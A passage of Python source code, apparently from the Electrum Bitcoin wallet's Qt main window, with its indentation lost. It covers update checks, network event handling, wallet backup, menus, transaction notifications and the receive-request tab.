_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
